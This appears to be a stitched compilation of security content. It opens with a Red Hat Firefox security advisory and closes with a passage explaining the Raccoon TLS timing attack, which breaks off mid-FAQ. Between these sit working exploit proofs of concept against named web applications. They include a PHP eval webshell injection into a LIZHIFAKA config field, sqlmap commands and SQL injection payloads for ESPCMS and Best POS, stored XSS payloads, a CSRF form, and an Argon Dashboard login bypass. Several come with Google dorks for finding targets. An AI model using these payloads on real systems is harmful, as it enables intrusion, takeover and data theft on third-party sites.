An update for firefox is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-0767: The Mozilla Foundation Security Advisory describes this flaw as:
An attacker could construct a PKCS 12 cert bundle in such a way that could allow for arbitrary memory writes via PKCS 12 Safe Bag attributes being mishandled.
* CVE-2023-25728: The Mozilla Foundation Security Advisory describes this flaw as:
The `Content-Security-Policy-Report-Only` header could allow an attacker to leak a child iframe's unredacted URI when interaction with that iframe triggers a redirect.
* CVE-2023-25729: The Mozilla Foundation Security Advisory describes this flaw as:
Permission prompts for opening external schemes were only shown for `ContentPrincipals` resulting in extensions being able to open them without user interaction via `ExpandedPrincipals`. This could lead to further malicious actions such as downloading files or interacting with software already installed on the system.
* CVE-2023-25730: The Mozilla Foundation Security Advisory describes this flaw as:
A background script invoking `requestFullscreen` and then blocking the main thread could force the browser into fullscreen mode indefinitely, resulting in potential user confusion or spoofing attacks.
* CVE-2023-25732: The Mozilla Foundation Security Advisory describes this flaw as:
When encoding data from an `inputStream` in `xpcom` the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write.
* CVE-2023-25735: The Mozilla Foundation Security Advisory describes this flaw as:
Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free after unwrapping the proxy.
* CVE-2023-25737: The Mozilla Foundation Security Advisory describes this flaw as:
An invalid downcast from `nsTextNode` to `SVGElement` could have lead to undefined behavior.
* CVE-2023-25739: The Mozilla Foundation Security Advisory describes this flaw as:
Module load requests that failed were not being checked as to whether or not they were cancelled causing a use-after-free in `ScriptLoadContext`.
* CVE-2023-25742: The Mozilla Foundation Security Advisory describes this flaw as:
When importing a SPKI RSA public key as ECDSA P-256, the key would be handled incorrectly causing the tab to crash.
* CVE-2023-25743: The Mozilla Foundation Security Advisory describes this flaw as:
A lack of in app notification for entering fullscreen mode could have lead to a malicious website spoofing browser chrome.
*This bug only affects Firefox Focus. Other versions of Firefox are unaffected.*
* CVE-2023-25744: The Mozilla Foundation Security Advisory describes this flaw as:
Mozilla developers Kershaw Chang and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109 and Firefox ESR 102.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
* CVE-2023-25746: The Mozilla Foundation Security Advisory describes this flaw as:
Mozilla developers Philipp and Gabriele Svelto reported memory safety bugs present in Firefox ESR 102.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.


Issued:

2023-02-20

Updated:

2023-02-20

**RHSA-2023:0806 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: firefox security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for firefox is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.  

This update upgrades Firefox to version 102.8.0 ESR.  

Security Fix(es):  

*   Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)
*   Mozilla: Content security policy leak in violation reports using iframes (CVE-2023-25728)
*   Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)
*   Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey (CVE-2023-25735)
*   Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry (CVE-2023-25737)
*   Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)
*   Mozilla: Fullscreen notification not shown in Firefox Focus (CVE-2023-25743)
*   Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8 (CVE-2023-25744)
*   Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)
*   Mozilla: Extensions could have opened external schemes without user knowledge (CVE-2023-25729)
*   Mozilla: Out of bounds memory write from EncodeInputStream (CVE-2023-25732)
*   Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to take effect.

**Affected Products**

*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.1 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.1 x86\_64

**Fixes**

*   BZ - 2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes
*   BZ - 2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode
*   BZ - 2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus
*   BZ - 2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS
*   BZ - 2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey
*   BZ - 2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry
*   BZ - 2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext
*   BZ - 2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge
*   BZ - 2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream
*   BZ - 2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab
*   BZ - 2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8
*   BZ - 2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8

**CVEs**

*   CVE-2023-0767
*   CVE-2023-25728
*   CVE-2023-25729
*   CVE-2023-25730
*   CVE-2023-25732
*   CVE-2023-25735
*   CVE-2023-25737
*   CVE-2023-25739
*   CVE-2023-25742
*   CVE-2023-25743
*   CVE-2023-25744
*   CVE-2023-25746

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.1**

SRPM

firefox-102.8.0-2.el8\_1.src.rpm

SHA-256: becf31c06de9e53c475acac72459a2c7b677acdef4c91751007b94c71b7e68fd

ppc64le

firefox-102.8.0-2.el8\_1.ppc64le.rpm

SHA-256: 1eb3e335c86e99c92fc459ea3acb5f157bd102742dd414451ab515a5f7018177

firefox-debuginfo-102.8.0-2.el8\_1.ppc64le.rpm

SHA-256: fbc01ccd21150cc10df1fd5f8015b76f362be06f7e014bd59549efc1bf52e50a

firefox-debugsource-102.8.0-2.el8\_1.ppc64le.rpm

SHA-256: 8b2b87ee0a62c932b2dbe8a2b118b37b55bb569d3ee18885771bfb651f6556d1

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.1**

SRPM

firefox-102.8.0-2.el8\_1.src.rpm

SHA-256: becf31c06de9e53c475acac72459a2c7b677acdef4c91751007b94c71b7e68fd

x86\_64

firefox-102.8.0-2.el8\_1.x86\_64.rpm

SHA-256: faf1c92c131ef2a15ca421aec6b8c9665099ebec5789441880e4a4e2f1c96859

firefox-debuginfo-102.8.0-2.el8\_1.x86\_64.rpm

SHA-256: f41dfd95789fdd54a9de7352a85cd754745734d7f473b85027ae5d158119548b

firefox-debugsource-102.8.0-2.el8\_1.x86\_64.rpm

SHA-256: eb0d4f384c54d613309ecacdef8668c888a3d32526e3c47d2182b9619cdb2449

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:0806: Red Hat Security Advisory: firefox security update

Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location.

Sorry for my bad english

English：  
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions  
Chinese：  
/admin/index/email （需要管理员权限） 后台修改email密码处可以getshell获取网站权限

POC：  
POST /admin/api/config/editEmail HTTP/1.1  
Host: www.lizhi.top  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 49  
Origin: http://www.lizhi.top  
Connection: close  
Referer: http://www.lizhi.top/admin/index/email  
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi

smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($\_POST\['a'\])};",'a'=>'

CVE-2021-34164: An issue was discovered in LIZHIFAKA 2.2.0 · Issue #22 · lizhipay/faka

An issue was discovered in ESPCMS P8.21120101 after logging in to the background, there is a SQL injection vulnerability in the function node where members are added.

****Issue****

After logging in to the background, there is a SQL injection vulnerability in adding member function points

****Steps to reproduce****

1.  Log in to the management background
2.  Click Member>Add Member  
      
      
    

Problematic packets:

    GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
    Host: 127.0.0.1:8010
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
    Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    

use sqlmap: sqlmap.py -r ss.txt -p verify\_key --current-db

    ---
    Parameter: verify_key (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
    ---

CVE-2023-23007: There is a sql injection vulnerability in ESPCMS P8.21120101 · Issue #I680WG · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

Best POS Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 14/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_category HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------7128987773293048653857517  
Content-Length: 442  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-category  
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="id"

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>  
-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="description"

This is POC  
-----------------------------7128987773293048653857517--  
```

--------------------------------------

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_product HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------11015616619250686693182759357  
Content-Length: 830  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-product  
Cookie: PHPSESSID=<COOKIE>  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="id"

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="category_id"

3'  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="price"

1122  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="status"

1  
-----------------------------11015616619250686693182759357--

```

Best POS Management System 1.0 Cross Site Scripting

Demanzo Matrimony version 1.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Demanzo Matrimony v.1.5 CSRF Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit)                                            |   
| # Vendor    : https://demanzo.com/matrimony-site-development/                                                                    |    
| # Dork      : Powered by ITAcumens or "Powered by Demanzo"                                                                       |  
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

</div>  
                       <form action="https://www.example/web/html/admin/add-staff.php" method="POST">  
            <div id="msg">  
                          <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">   
                                    <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>  
                                    <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>  
                            </div>  
                            </div>

                                                           <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">     
                                </div>  
                            </div>   

                                                        <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label col-md-2 frm_pd">Address  <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>    
                                </div>  
                            </div> 

                                                          
                                
                                  
                                    
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                  
                            

                                                          
                                
                                  
                                       
                                       
                              
                            

                                                        <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">  
                              <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>  
                                <div class="col-lg-8 col-md-10 frm_pd">   
                                    <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>  
                                    <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>  
                            </div>  
                            </div>

                                                        <div class="col-md-2 col-md-offset-5 col-sm-12">  
                                <input type="submit" class="ctn_btn no_mt1" value="Add" name="add">  
                            </div> 

 Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

Demanzo Matrimony 1.5 Cross Site Request Forgery

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Argon Dashboard 1.1.2 SQL Injection

The Raccoon attack is a timing attack on DHE ciphersuites inherit in the TLS specification. To mitigate this vulnerability, Firefox disabled support for DHE ciphersuites.

Raccoon is a timing vulnerability in the TLS **specification** that affects HTTPS and other services that rely on SSL and TLS. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third-parties being able to read the communication.

Raccoon allows attackers under certain conditions to break the encryption and read sensitive communications. The vulnerability is really hard to exploit and relies on very precise timing measurements and on a specific server configuration to be exploitable.

**Attack Overview**

Diffie-Hellman (DH) key exchange is a well-established method for exchanging keys in TLS connections. When using Diffie-Hellman, both TLS peers generate private keys at random (a and b) and compute their public keys: ga mod p and gb mod p. These public keys are sent in the TLS KeyExchange messages. Once both keys are received, both the client and server can compute a shared key _gab mod p_ - called _premaster secret_ - which is used to derive all TLS session keys with a specific _key derivation function_.

Our Raccoon attack exploits a TLS specification side channel; TLS 1.2 (and all previous versions) prescribes that all leading zero bytes in the premaster secret are stripped before used in further computations. Since the resulting premaster secret is used as an input into the key derivation function, which is based on hash functions with different timing profiles, precise timing measurements may enable an attacker to construct an oracle from a TLS server. This oracle tells the attacker whether a computed premaster secret starts with zero or not. For example, the attacker could eavesdrop ga sent by the client, resend it to the server, and determine whether the resulting premaster secret starts with zero or not.

Learning one byte from a premaster secret would not help the attacker much. However, here the attack gets interesting. Imagine the attacker intercepted a ClientKeyExchange message containing the value ga. The attacker can now construct values related to ga and send them to the server in distinct TLS handshakes. More concretely, the attacker constructs values gri\*ga, which lead to premaster secrets gri\*b\*gab. Based on the server timing behavior, the attacker can find values leading to premaster secrets starting with zero. In the end, this helps the attacker to construct a set of equations and use a solver for the Hidden Number Problem (HNP) to compute the original premaster secret established between the client and the server.

**Full Technical Paper (last update: 11.2.2021)**

Raccoon Attack: Finding and Exploiting Most-Significant-Bit-Oracles in TLS-DH(E). Robert Merget, Marcus Brinkmann, Nimrod Aviram, Juraj Somorovsky, Johannes Mittmann, and Jörg Schwenk.

**FAQ****I am an admin, should I drop everything and fix this?**

Probably not. Raccoon is a complex timing attack and it is very hard to exploit. It requires a lot of stars to align to decrypt a real-world TLS session. There are, however, exceptions.

**What can the attackers gain?**

In the case the (rare) circumstances are met, Raccoon allows an attacker to decrypt the connection between users and the server. This typically includes, but is not limited to, usernames and passwords, credit card numbers, emails, instant messages, and sensitive documents.

**Who is vulnerable?**

The attack generally targets the Diffie-Hellman key exchange in TLS 1.2 and below. There are two prerequisites for the attack:

*   The server reuses public DH keys in the TLS handshake. This is the case if the server is configured to use static TLS-DH cipher suites, or if the server uses ephemeral cipher suites (TLS-DHE) and reuses ephemeral keys for multiple connections. Luckily, this was already considered bad practice before the attack, as it does not provide forward secrecy.
*   The attacker can execute precise timing measurements, which allow him/her to find out whether the first byte of the DH shared secret starts with zero or not.

**So how practical is the attack?**

